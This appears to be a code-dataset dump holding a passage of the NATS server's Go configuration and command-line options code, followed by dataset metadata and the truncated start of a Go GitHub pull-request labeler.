case "handshake_timeout":
ht := time.Duration(0)
switch mv := mv.(type) {
case int64:
ht = time.Duration(mv) * time.Second
case string:
var err error
ht, err = time.ParseDuration(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
default:
err := &configErr{tk, fmt.Sprintf("error parsing handshake timeout: unsupported type %T", mv)}
*errors = append(*errors, err)
}
o.Websocket.HandshakeTimeout = ht
case "compression":
o.Websocket.Compression = mv.(bool)
case "authorization", "authentication":
auth := parseSimpleAuth(tk, errors, warnings)
o.Websocket.Username = auth.user
o.Websocket.Password = auth.pass
o.Websocket.Token = auth.token
o.Websocket.AuthTimeout = auth.timeout
case "jwt_cookie":
o.Websocket.JWTCookie = mv.(string)
case "no_auth_user":
o.Websocket.NoAuthUser = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
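// Illustrative sketch (assumption, not taken from this file): a websocket block
// using the fields handled above. Host, port, and origins are made-up placeholders.
// e.g.
//   websocket {
//     listen: "0.0.0.0:8080"
//     no_tls: true
//     compression: true
//     allowed_origins: ["https://example.com"]
//   }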
func parseMQTT(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected mqtt to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.MQTT.Host = hp.host
o.MQTT.Port = hp.port
case "port":
o.MQTT.Port = int(mv.(int64))
case "host", "net":
o.MQTT.Host = mv.(string)
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if o.MQTT.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.MQTT.TLSTimeout = tc.Timeout
o.MQTT.TLSMap = tc.Map
case "authorization", "authentication":
auth := parseSimpleAuth(tk, errors, warnings)
o.MQTT.Username = auth.user
o.MQTT.Password = auth.pass
o.MQTT.Token = auth.token
o.MQTT.AuthTimeout = auth.timeout
case "no_auth_user":
o.MQTT.NoAuthUser = mv.(string)
case "ack_wait", "ackwait":
o.MQTT.AckWait = parseDuration("ack_wait", tk, mv, errors, warnings)
case "max_ack_pending", "max_pending", "max_inflight":
tmp := int(mv.(int64))
if tmp < 0 || tmp > 0xFFFF {
err := &configErr{tk, fmt.Sprintf("invalid value %v, should in [0..%d] range", tmp, 0xFFFF)}
*errors = append(*errors, err)
} else {
o.MQTT.MaxAckPending = uint16(tmp)
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
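// Illustrative sketch (assumption, not taken from this file): an mqtt block using
// the fields handled above. Host, port, and limits are made-up placeholders.
// e.g.
//   mqtt {
//     listen: "0.0.0.0:1883"
//     ack_wait: "30s"
//     max_ack_pending: 100
//   }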
// GenTLSConfig loads TLS related configuration parameters.
func GenTLSConfig(tc *TLSConfigOpts) (*tls.Config, error) {
// Create the tls.Config from our options before including the certs.
// It will determine the cipher suites that we prefer.
// FIXME(dlc) change if ARM based.
config := tls.Config{
MinVersion: tls.VersionTLS12,
CipherSuites: tc.Ciphers,
PreferServerCipherSuites: true,
CurvePreferences: tc.CurvePreferences,
InsecureSkipVerify: tc.Insecure,
}
switch {
case tc.CertFile != "" && tc.KeyFile == "":
return nil, fmt.Errorf("missing 'key_file' in TLS configuration")
case tc.CertFile == "" && tc.KeyFile != "":
return nil, fmt.Errorf("missing 'cert_file' in TLS configuration")
case tc.CertFile != "" && tc.KeyFile != "":
// Now load in cert and private key
cert, err := tls.LoadX509KeyPair(tc.CertFile, tc.KeyFile)
if err != nil {
return nil, fmt.Errorf("error parsing X509 certificate/key pair: %v", err)
}
cert.Leaf, err = x509.ParseCertificate(cert.Certificate[0])
if err != nil {
return nil, fmt.Errorf("error parsing certificate: %v", err)
}
config.Certificates = []tls.Certificate{cert}
}
// Require client certificates as needed
if tc.Verify {
config.ClientAuth = tls.RequireAndVerifyClientCert
}
// Add in CAs if applicable.
if tc.CaFile != "" {
rootPEM, err := ioutil.ReadFile(tc.CaFile)
if err != nil || rootPEM == nil {
return nil, err
}
pool := x509.NewCertPool()
ok := pool.AppendCertsFromPEM(rootPEM)
if !ok {
return nil, fmt.Errorf("failed to parse root ca certificate")
}
config.ClientCAs = pool
}
return &config, nil
}
// MergeOptions will merge two options giving preference to the flagOpts
// if the item is present.
func MergeOptions(fileOpts, flagOpts *Options) *Options {
if fileOpts == nil {
return flagOpts
}
if flagOpts == nil {
return fileOpts
}
// Merge the two, flagOpts override
opts := *fileOpts
if flagOpts.Port != 0 {
opts.Port = flagOpts.Port
}
if flagOpts.Host != "" {
opts.Host = flagOpts.Host
}
if flagOpts.ClientAdvertise != "" {
opts.ClientAdvertise = flagOpts.ClientAdvertise
}
if flagOpts.Username != "" {
opts.Username = flagOpts.Username
}
if flagOpts.Password != "" {
opts.Password = flagOpts.Password
}
if flagOpts.Authorization != "" {
opts.Authorization = flagOpts.Authorization
}
if flagOpts.HTTPPort != 0 {
opts.HTTPPort = flagOpts.HTTPPort
}
if flagOpts.HTTPBasePath != "" {
opts.HTTPBasePath = flagOpts.HTTPBasePath
}
if flagOpts.Debug {
opts.Debug = true
}
if flagOpts.Trace {
opts.Trace = true
}
if flagOpts.Logtime {
opts.Logtime = true
}
if flagOpts.LogFile != "" {
opts.LogFile = flagOpts.LogFile
}
if flagOpts.PidFile != "" {
opts.PidFile = flagOpts.PidFile
}
if flagOpts.PortsFileDir != "" {
opts.PortsFileDir = flagOpts.PortsFileDir
}
if flagOpts.ProfPort != 0 {
opts.ProfPort = flagOpts.ProfPort
}
if flagOpts.Cluster.ListenStr != "" {
opts.Cluster.ListenStr = flagOpts.Cluster.ListenStr
}
if flagOpts.Cluster.NoAdvertise {
opts.Cluster.NoAdvertise = true
}
if flagOpts.Cluster.ConnectRetries != 0 {
opts.Cluster.ConnectRetries = flagOpts.Cluster.ConnectRetries
}
if flagOpts.Cluster.Advertise != "" {
opts.Cluster.Advertise = flagOpts.Cluster.Advertise
}
if flagOpts.RoutesStr != "" {
mergeRoutes(&opts, flagOpts)
}
return &opts
}
// RoutesFromStr parses route URLs from a string
func RoutesFromStr(routesStr string) []*url.URL {
routes := strings.Split(routesStr, ",")
if len(routes) == 0 {
return nil
}
routeUrls := []*url.URL{}
for _, r := range routes {
r = strings.TrimSpace(r)
u, _ := url.Parse(r)
routeUrls = append(routeUrls, u)
}
return routeUrls
}
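// Illustrative usage sketch (assumption, not taken from this file); the URLs are placeholders.
// e.g. RoutesFromStr("nats://10.0.0.1:6222,nats://10.0.0.2:6222")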
// This will merge the flag routes and override anything that was present.
func mergeRoutes(opts, flagOpts *Options) {
routeUrls := RoutesFromStr(flagOpts.RoutesStr)
if routeUrls == nil {
return
}
opts.Routes = routeUrls
opts.RoutesStr = flagOpts.RoutesStr
}
// RemoveSelfReference removes this server from an array of routes
func RemoveSelfReference(clusterPort int, routes []*url.URL) ([]*url.URL, error) {
var cleanRoutes []*url.URL
cport := strconv.Itoa(clusterPort)
selfIPs, err := getInterfaceIPs()
if err != nil {
return nil, err
}
for _, r := range routes {
host, port, err := net.SplitHostPort(r.Host)
if err != nil {
return nil, err
}
ipList, err := getURLIP(host)
if err != nil {
return nil, err
}
if cport == port && isIPInList(selfIPs, ipList) {
continue
}
cleanRoutes = append(cleanRoutes, r)
}
return cleanRoutes, nil
}
func isIPInList(list1 []net.IP, list2 []net.IP) bool {
for _, ip1 := range list1 {
for _, ip2 := range list2 {
if ip1.Equal(ip2) {
return true
}
}
}
return false
}
func getURLIP(ipStr string) ([]net.IP, error) {
ipList := []net.IP{}
ip := net.ParseIP(ipStr)
if ip != nil {
ipList = append(ipList, ip)
return ipList, nil
}
hostAddr, err := net.LookupHost(ipStr)
if err != nil {
return nil, fmt.Errorf("Error looking up host with route hostname: %v", err)
}
for _, addr := range hostAddr {
ip = net.ParseIP(addr)
if ip != nil {
ipList = append(ipList, ip)
}
}
return ipList, nil
}
func getInterfaceIPs() ([]net.IP, error) {
var localIPs []net.IP
interfaceAddr, err := net.InterfaceAddrs()
if err != nil {
return nil, fmt.Errorf("Error getting self referencing address: %v", err)
}
for i := 0; i < len(interfaceAddr); i++ {
interfaceIP, _, _ := net.ParseCIDR(interfaceAddr[i].String())
if net.ParseIP(interfaceIP.String()) != nil {
localIPs = append(localIPs, interfaceIP)
} else {
return nil, fmt.Errorf("Error parsing self referencing address: %v", err)
}
}
return localIPs, nil
}
func setBaselineOptions(opts *Options) {
// Setup non-standard Go defaults
if opts.Host == "" {
opts.Host = DEFAULT_HOST
}
if opts.HTTPHost == "" {
// Default to same bind from server if left undefined
opts.HTTPHost = opts.Host
}
if opts.Port == 0 {
opts.Port = DEFAULT_PORT
} else if opts.Port == RANDOM_PORT {
// Choose randomly inside of net.Listen
opts.Port = 0
}
if opts.MaxConn == 0 {
opts.MaxConn = DEFAULT_MAX_CONNECTIONS
}
if opts.PingInterval == 0 {
opts.PingInterval = DEFAULT_PING_INTERVAL
}
if opts.MaxPingsOut == 0 {
opts.MaxPingsOut = DEFAULT_PING_MAX_OUT
}
if opts.TLSTimeout == 0 {
opts.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.AuthTimeout == 0 {
opts.AuthTimeout = getDefaultAuthTimeout(opts.TLSConfig, opts.TLSTimeout)
}
if opts.Cluster.Port != 0 {
if opts.Cluster.Host == "" {
opts.Cluster.Host = DEFAULT_HOST
}
if opts.Cluster.TLSTimeout == 0 {
opts.Cluster.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.Cluster.AuthTimeout == 0 {
opts.Cluster.AuthTimeout = getDefaultAuthTimeout(opts.Cluster.TLSConfig, opts.Cluster.TLSTimeout)
}
}
if opts.LeafNode.Port != 0 {
if opts.LeafNode.Host == "" {
opts.LeafNode.Host = DEFAULT_HOST
}
if opts.LeafNode.TLSTimeout == 0 {
opts.LeafNode.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.LeafNode.AuthTimeout == 0 {
opts.LeafNode.AuthTimeout = getDefaultAuthTimeout(opts.LeafNode.TLSConfig, opts.LeafNode.TLSTimeout)
}
}
// Set baseline connect port for remotes.
for _, r := range opts.LeafNode.Remotes {
if r != nil {
for _, u := range r.URLs {
if u.Port() == "" {
u.Host = net.JoinHostPort(u.Host, strconv.Itoa(DEFAULT_LEAFNODE_PORT))
}
}
}
}
// Set this regardless of opts.LeafNode.Port
if opts.LeafNode.ReconnectInterval == 0 {
opts.LeafNode.ReconnectInterval = DEFAULT_LEAF_NODE_RECONNECT
}
if opts.MaxControlLine == 0 {
opts.MaxControlLine = MAX_CONTROL_LINE_SIZE
}
if opts.MaxPayload == 0 {
opts.MaxPayload = MAX_PAYLOAD_SIZE
}
if opts.MaxPending == 0 {
opts.MaxPending = MAX_PENDING_SIZE
}
if opts.WriteDeadline == time.Duration(0) {
opts.WriteDeadline = DEFAULT_FLUSH_DEADLINE
}
if opts.MaxClosedClients == 0 {
opts.MaxClosedClients = DEFAULT_MAX_CLOSED_CLIENTS
}
if opts.LameDuckDuration == 0 {
opts.LameDuckDuration = DEFAULT_LAME_DUCK_DURATION
}
if opts.LameDuckGracePeriod == 0 {
opts.LameDuckGracePeriod = DEFAULT_LAME_DUCK_GRACE_PERIOD
}
if opts.Gateway.Port != 0 {
if opts.Gateway.Host == "" {
opts.Gateway.Host = DEFAULT_HOST
}
if opts.Gateway.TLSTimeout == 0 {
opts.Gateway.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.Gateway.AuthTimeout == 0 {
opts.Gateway.AuthTimeout = getDefaultAuthTimeout(opts.Gateway.TLSConfig, opts.Gateway.TLSTimeout)
}
}
if opts.ConnectErrorReports == 0 {
opts.ConnectErrorReports = DEFAULT_CONNECT_ERROR_REPORTS
}
if opts.ReconnectErrorReports == 0 {
opts.ReconnectErrorReports = DEFAULT_RECONNECT_ERROR_REPORTS
}
if opts.Websocket.Port != 0 {
if opts.Websocket.Host == "" {
opts.Websocket.Host = DEFAULT_HOST
}
}
if opts.MQTT.Port != 0 {
if opts.MQTT.Host == "" {
opts.MQTT.Host = DEFAULT_HOST
}
if opts.MQTT.TLSTimeout == 0 {
opts.MQTT.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
}
// JetStream
if opts.JetStreamMaxMemory == 0 {
opts.JetStreamMaxMemory = -1
}
if opts.JetStreamMaxStore == 0 {
opts.JetStreamMaxStore = -1
}
}
func getDefaultAuthTimeout(tls *tls.Config, tlsTimeout float64) float64 {
var authTimeout float64
if tls != nil {
authTimeout = tlsTimeout + 1.0
} else {
authTimeout = float64(AUTH_TIMEOUT / time.Second)
}
return authTimeout
}
// ConfigureOptions accepts a flag set and augments it with NATS Server
// specific flags. On success, an options structure is returned configured
// based on the selected flags and/or configuration file.
// The command line options take precedence to the ones in the configuration file.
func ConfigureOptions(fs *flag.FlagSet, args []string, printVersion, printHelp, printTLSHelp func()) (*Options, error) {
opts := &Options{}
var (
showVersion bool
showHelp bool
showTLSHelp bool
signal string
configFile string
dbgAndTrace bool
trcAndVerboseTrc bool
dbgAndTrcAndVerboseTrc bool
err error
)
fs.BoolVar(&showHelp, "h", false, "Show this message.")
fs.BoolVar(&showHelp, "help", false, "Show this message.")
fs.IntVar(&opts.Port, "port", 0, "Port to listen on.")
fs.IntVar(&opts.Port, "p", 0, "Port to listen on.")
fs.StringVar(&opts.ServerName, "n", "", "Server name.")
fs.StringVar(&opts.ServerName, "name", "", "Server name.")
fs.StringVar(&opts.Host, "addr", "", "Network host to listen on.")
fs.StringVar(&opts.Host, "a", "", "Network host to listen on.")
fs.StringVar(&opts.Host, "net", "", "Network host to listen on.")
fs.StringVar(&opts.ClientAdvertise, "client_advertise", "", "Client URL to advertise to other servers.")
fs.BoolVar(&opts.Debug, "D", false, "Enable Debug logging.")
fs.BoolVar(&opts.Debug, "debug", false, "Enable Debug logging.")
fs.BoolVar(&opts.Trace, "V", false, "Enable Trace logging.")
fs.BoolVar(&trcAndVerboseTrc, "VV", false, "Enable Verbose Trace logging. (Traces system account as well)")
fs.BoolVar(&opts.Trace, "trace", false, "Enable Trace logging.")
fs.BoolVar(&dbgAndTrace, "DV", false, "Enable Debug and Trace logging.")
fs.BoolVar(&dbgAndTrcAndVerboseTrc, "DVV", false, "Enable Debug and Verbose Trace logging. (Traces system account as well)")
fs.BoolVar(&opts.Logtime, "T", true, "Timestamp log entries.")
fs.BoolVar(&opts.Logtime, "logtime", true, "Timestamp log entries.")
fs.StringVar(&opts.Username, "user", "", "Username required for connection.")
fs.StringVar(&opts.Password, "pass", "", "Password required for connection.")
fs.StringVar(&opts.Authorization, "auth", "", "Authorization token required for connection.")
fs.IntVar(&opts.HTTPPort, "m", 0, "HTTP Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPPort, "http_port", 0, "HTTP Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPSPort, "ms", 0, "HTTPS Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPSPort, "https_port", 0, "HTTPS Port for /varz, /connz endpoints.")
fs.StringVar(&configFile, "c", "", "Configuration file.")
fs.StringVar(&configFile, "config", "", "Configuration file.")
fs.BoolVar(&opts.CheckConfig, "t", false, "Check configuration and exit.")
fs.StringVar(&signal, "sl", "", "Send signal to nats-server process (stop, quit, reopen, reload).")
fs.StringVar(&signal, "signal", "", "Send signal to nats-server process (stop, quit, reopen, reload).")
fs.StringVar(&opts.PidFile, "P", "", "File to store process pid.")
fs.StringVar(&opts.PidFile, "pid", "", "File to store process pid.")
fs.StringVar(&opts.PortsFileDir, "ports_file_dir", "", "Creates a ports file in the specified directory (<executable_name>_<pid>.ports).")
fs.StringVar(&opts.LogFile, "l", "", "File to store logging output.")
fs.StringVar(&opts.LogFile, "log", "", "File to store logging output.")
fs.Int64Var(&opts.LogSizeLimit, "log_size_limit", 0, "Logfile size limit being auto-rotated")
fs.BoolVar(&opts.Syslog, "s", false, "Enable syslog as log method.")
fs.BoolVar(&opts.Syslog, "syslog", false, "Enable syslog as log method.")
fs.StringVar(&opts.RemoteSyslog, "r", "", "Syslog server addr (udp://127.0.0.1:514).")
fs.StringVar(&opts.RemoteSyslog, "remote_syslog", "", "Syslog server addr (udp://127.0.0.1:514).")
fs.BoolVar(&showVersion, "version", false, "Print version information.")
fs.BoolVar(&showVersion, "v", false, "Print version information.")
fs.IntVar(&opts.ProfPort, "profile", 0, "Profiling HTTP port.")
fs.StringVar(&opts.RoutesStr, "routes", "", "Routes to actively solicit a connection.")
fs.StringVar(&opts.Cluster.ListenStr, "cluster", "", "Cluster url from which members can solicit routes.")
fs.StringVar(&opts.Cluster.ListenStr, "cluster_listen", "", "Cluster url from which members can solicit routes.")
fs.StringVar(&opts.Cluster.Advertise, "cluster_advertise", "", "Cluster URL to advertise to other servers.")
fs.BoolVar(&opts.Cluster.NoAdvertise, "no_advertise", false, "Advertise known cluster IPs to clients.")
fs.IntVar(&opts.Cluster.ConnectRetries, "connect_retries", 0, "For implicit routes, number of connect retries.")
fs.StringVar(&opts.Cluster.Name, "cluster_name", "", "Cluster Name, if not set one will be dynamically generated.")
fs.BoolVar(&showTLSHelp, "help_tls", false, "TLS help.")
fs.BoolVar(&opts.TLS, "tls", false, "Enable TLS.")
fs.BoolVar(&opts.TLSVerify, "tlsverify", false, "Enable TLS with client verification.")
fs.StringVar(&opts.TLSCert, "tlscert", "", "Server certificate file.")
fs.StringVar(&opts.TLSKey, "tlskey", "", "Private key for server certificate.")
fs.StringVar(&opts.TLSCaCert, "tlscacert", "", "Client certificate CA for verification.")
fs.IntVar(&opts.MaxTracedMsgLen, "max_traced_msg_len", 0, "Maximum printable length for traced messages. 0 for unlimited.")
fs.BoolVar(&opts.JetStream, "js", false, "Enable JetStream.")
fs.BoolVar(&opts.JetStream, "jetstream", false, "Enable JetStream.")
fs.StringVar(&opts.StoreDir, "sd", "", "Storage directory.")
fs.StringVar(&opts.StoreDir, "store_dir", "", "Storage directory.")
// The flags definition above set "default" values to some of the options.
// Calling Parse() here will override the default options with any value
// specified from the command line. This is ok. We will then update the
// options with the content of the configuration file (if present), and then,
// call Parse() again to override the default+config with command line values.
// Calling Parse() before processing config file is necessary since configFile
// itself is a command line argument, and also Parse() is required in order
// to know if user wants simply to show "help" or "version", etc...
if err := fs.Parse(args); err != nil {
return nil, err
}
if showVersion {
printVersion()
return nil, nil
}
if showHelp {
printHelp()
return nil, nil
}
if showTLSHelp {
printTLSHelp()
return nil, nil
}
// Process args looking for non-flag options,
// 'version' and 'help' only for now
showVersion, showHelp, err = ProcessCommandLineArgs(fs)
if err != nil {
return nil, err
} else if showVersion {
printVersion()
return nil, nil
} else if showHelp {
printHelp()
return nil, nil
}
// Snapshot flag options.
FlagSnapshot = opts.Clone()
// Keep track of the boolean flags that were explicitly set with their value.
fs.Visit(func(f *flag.Flag) {
switch f.Name {
case "DVV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", dbgAndTrcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", dbgAndTrcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "TraceVerbose", dbgAndTrcAndVerboseTrc)
case "DV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", dbgAndTrace)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", dbgAndTrace)
case "D":
fallthrough
case "debug":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", FlagSnapshot.Debug)
case "VV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", trcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "TraceVerbose", trcAndVerboseTrc)
case "V":
fallthrough
case "trace":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", FlagSnapshot.Trace)
case "T":
fallthrough
case "logtime":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Logtime", FlagSnapshot.Logtime)
case "s":
fallthrough
case "syslog":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Syslog", FlagSnapshot.Syslog)
case "no_advertise":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Cluster.NoAdvertise", FlagSnapshot.Cluster.NoAdvertise)
}
})
// Process signal control.
if signal != "" {
if err := processSignal(signal); err != nil {
return nil, err
}
}
// Parse config if given
if configFile != "" {
// This will update the options with values from the config file.
err := opts.ProcessConfigFile(configFile)
if err != nil {
if opts.CheckConfig {
return nil, err
}
if cerr, ok := err.(*processConfigErr); !ok || len(cerr.Errors()) != 0 {
return nil, err
}
// If we get here we only have warnings and can still continue
fmt.Fprint(os.Stderr, err)
} else if opts.CheckConfig {
// Report configuration file syntax test was successful and exit.
return opts, nil
}
// Call this again to override config file options with options from command line.
// Note: We don't need to check error here since if there was an error, it would
// have been caught the first time this function was called (after setting up the
// flags).
fs.Parse(args)
} else if opts.CheckConfig {
return nil, fmt.Errorf("must specify [-c, --config] option to check configuration file syntax")
}
// Special handling of some flags
var (
flagErr error
tlsDisabled bool
tlsOverride bool
)
fs.Visit(func(f *flag.Flag) {
// short-circuit if an error was encountered
if flagErr != nil {
return
}
if strings.HasPrefix(f.Name, "tls") {
if f.Name == "tls" {
if !opts.TLS {
// User has specified "-tls=false", we need to disable TLS
opts.TLSConfig = nil
tlsDisabled = true
tlsOverride = false
return
}
tlsOverride = true
} else if !tlsDisabled {
tlsOverride = true
}
} else {
switch f.Name {
case "VV":
opts.Trace, opts.TraceVerbose = trcAndVerboseTrc, trcAndVerboseTrc
case "DVV":
opts.Trace, opts.Debug, opts.TraceVerbose = dbgAndTrcAndVerboseTrc, dbgAndTrcAndVerboseTrc, dbgAndTrcAndVerboseTrc
case "DV":
// Check value to support -DV=false
opts.Trace, opts.Debug = dbgAndTrace, dbgAndTrace
case "cluster", "cluster_listen":
// Override cluster config if explicitly set via flags.
flagErr = overrideCluster(opts)
case "routes":
// Keep in mind that the flag has updated opts.RoutesStr at this point.
if opts.RoutesStr == "" {
// Set routes array to nil since routes string is empty
opts.Routes = nil
return
}
routeUrls := RoutesFromStr(opts.RoutesStr)
opts.Routes = routeUrls
}
}
})
if flagErr != nil {
return nil, flagErr
}
// This will be true if some of the `-tls` params have been set and
// `-tls=false` has not been set.
if tlsOverride {
if err := overrideTLS(opts); err != nil {
return nil, err
}
}
// If we don't have cluster defined in the configuration
// file and no cluster listen string override, but we do
// have a routes override, we need to report misconfiguration.
if opts.RoutesStr != "" && opts.Cluster.ListenStr == "" && opts.Cluster.Host == "" && opts.Cluster.Port == 0 {
return nil, errors.New("solicited routes require cluster capabilities, e.g. --cluster")
}
return opts, nil
}
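// Illustrative usage sketch (assumption, not taken from this file): the flag set name
// and callbacks are placeholders; wire in the host binary's real print/help functions.
// e.g.
//   fs := flag.NewFlagSet("nats-server", flag.ExitOnError)
//   opts, err := ConfigureOptions(fs, os.Args[1:],
//       func() { fmt.Println("version") },
//       fs.Usage,
//       PrintTLSHelpAndDie)
//   if err != nil { log.Fatal(err) }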
func normalizeBasePath(p string) string {
if len(p) == 0 {
return "/"
}
// add leading slash
if p[0] != '/' {
p = "/" + p
}
return path.Clean(p)
}
// overrideTLS is called when at least "-tls=true" has been set.
func overrideTLS(opts *Options) error {
if opts.TLSCert == "" {
return errors.New("TLS Server certificate must be present and valid")
}
if opts.TLSKey == "" {
return errors.New("TLS Server private key must be present and valid")
}
tc := TLSConfigOpts{}
tc.CertFile = opts.TLSCert
tc.KeyFile = opts.TLSKey
tc.CaFile = opts.TLSCaCert
tc.Verify = opts.TLSVerify
var err error
opts.TLSConfig, err = GenTLSConfig(&tc)
return err
}
// overrideCluster updates Options.Cluster if that flag "cluster" (or "cluster_listen")
// has explicitly be set in the command line. If it is set to empty string, it will
// clear the Cluster options.
func overrideCluster(opts *Options) error {
if opts.Cluster.ListenStr == "" {
// This one is enough to disable clustering.
opts.Cluster.Port = 0
return nil
}
// -1 will fail url.Parse, so if we have -1, change it to
// 0, and then after parse, replace the port with -1 so we get
// automatic port allocation
wantsRandom := false
if strings.HasSuffix(opts.Cluster.ListenStr, ":-1") {
wantsRandom = true
cls := fmt.Sprintf("%s:0", opts.Cluster.ListenStr[0:len(opts.Cluster.ListenStr)-3])
opts.Cluster.ListenStr = cls
}
clusterURL, err := url.Parse(opts.Cluster.ListenStr)
if err != nil {
return err
}
h, p, err := net.SplitHostPort(clusterURL.Host)
if err != nil {
return err
}
if wantsRandom {
p = "-1"
}
opts.Cluster.Host = h
_, err = fmt.Sscan(p, &opts.Cluster.Port)
if err != nil {
return err
}
if clusterURL.User != nil {
pass, hasPassword := clusterURL.User.Password()
if !hasPassword {
return errors.New("expected cluster password to be set")
}
opts.Cluster.Password = pass
user := clusterURL.User.Username()
opts.Cluster.Username = user
} else {
// Since we override from flag and there is no user/pwd, make
// sure we clear what we may have gotten from config file.
opts.Cluster.Username = ""
opts.Cluster.Password = ""
}
return nil
}
func processSignal(signal string) error {
var (
pid string
commandAndPid = strings.Split(signal, "=")
)
if l := len(commandAndPid); l == 2 {
pid = maybeReadPidFile(commandAndPid[1])
} else if l > 2 {
return fmt.Errorf("invalid signal parameters: %v", commandAndPid[2:])
}
if err := ProcessSignal(Command(commandAndPid[0]), pid); err != nil {
return err
}
os.Exit(0)
return nil
}
// maybeReadPidFile returns a PID or Windows service name obtained via the following method:
// 1. Try to open a file with path "pidStr" (absolute or relative).
// 2. If such a file exists and can be read, return its contents.
// 3. Otherwise, return the original "pidStr" string.
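// For example (illustrative), a signal argument of "quit=/var/run/nats.pid"
// makes processSignal use the contents of that file as the PID, while
// "quit=1234" uses "1234" as-is.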
func maybeReadPidFile(pidStr string) string {
if b, err := ioutil.ReadFile(pidStr); err == nil {
return string(b)
}
return pidStr
}
func homeDir() (string, error) {
if runtime.GOOS == "windows" {
homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH")
userProfile := os.Getenv("USERPROFILE")
home := filepath.Join(homeDrive, homePath)
if homeDrive == "" || homePath == "" {
if userProfile == "" {
return "", errors.New("nats: failed to get home dir, require %HOMEDRIVE% and %HOMEPATH% or %USERPROFILE%")
}
home = userProfile
}
return home, nil
}
home := os.Getenv("HOME")
if home == "" {
return "", errors.New("failed to get home dir, require $HOME")
}
return home, nil
}
func expandPath(p string) (string, error) {
p = os.ExpandEnv(p)
if !strings.HasPrefix(p, "~") {
return p, nil
}
home, err := homeDir()
if err != nil {
return "", err
}
return filepath.Join(home, p[1:]), nil
}
|
[
"\"HOMEDRIVE\"",
"\"HOMEPATH\"",
"\"USERPROFILE\"",
"\"HOME\""
] |
[] |
[
"USERPROFILE",
"HOME",
"HOMEPATH",
"HOMEDRIVE"
] |
[]
|
["USERPROFILE", "HOME", "HOMEPATH", "HOMEDRIVE"]
|
go
| 4 | 0 | |
pkg/labeler.go
|
package labeler
import (
"fmt"
"io/ioutil"
"log"
"math"
"net/http"
"os"
"regexp"
"strconv"
"strings"
gh "github.com/google/go-github/v27/github"
"github.com/rharper-sapient/diffparser"
)
type LabelerConfig map[string]LabelMatcher
type LabelMatcher struct {
Title string
Branch string
Files []string
Mergeable string
SizeBelow string `yaml:"size-below"`
SizeAbove string `yaml:"size-above"`
}
// LabelUpdates represents a request to update the set of labels
type LabelUpdates struct {
set map[string]bool
}
type Labeler struct {
FetchRepoConfig func(owner string, repoName string) (*LabelerConfig, error)
ReplaceLabelsForPr func(owner string, repoName string, prNumber int, labels []string) error
GetCurrentLabels func(owner string, repoName string, prNumber int) ([]string, error)
}
type Condition struct {
Evaluate func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error)
GetName func() string
}
func NewTitleCondition() Condition {
return Condition{
GetName: func() string {
return "Title matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Title) <= 0 {
return false, fmt.Errorf("title is not set in config")
}
log.Printf("Matching `%s` against: `%s`", matcher.Title, pr.GetTitle())
isMatched, _ := regexp.Match(matcher.Title, []byte(pr.GetTitle()))
return isMatched, nil
},
}
}
func NewBranchCondition() Condition {
return Condition{
GetName: func() string {
return "Branch matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Branch) <= 0 {
return false, fmt.Errorf("branch is not set in config")
}
prBranchName := pr.Head.GetRef()
log.Printf("Matching `%s` against: `%s`", matcher.Branch, prBranchName)
isMatched, _ := regexp.Match(matcher.Branch, []byte(prBranchName))
return isMatched, nil
},
}
}
func NewFilesCondition() Condition {
prFiles := []string{}
return Condition{
GetName: func() string {
return "File matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Files) <= 0 {
return false, fmt.Errorf("Files are not set in config")
}
if len(prFiles) == 0 {
var err error
prFiles, err = getPrFileNames(pr)
if err != nil {
return false, err
}
}
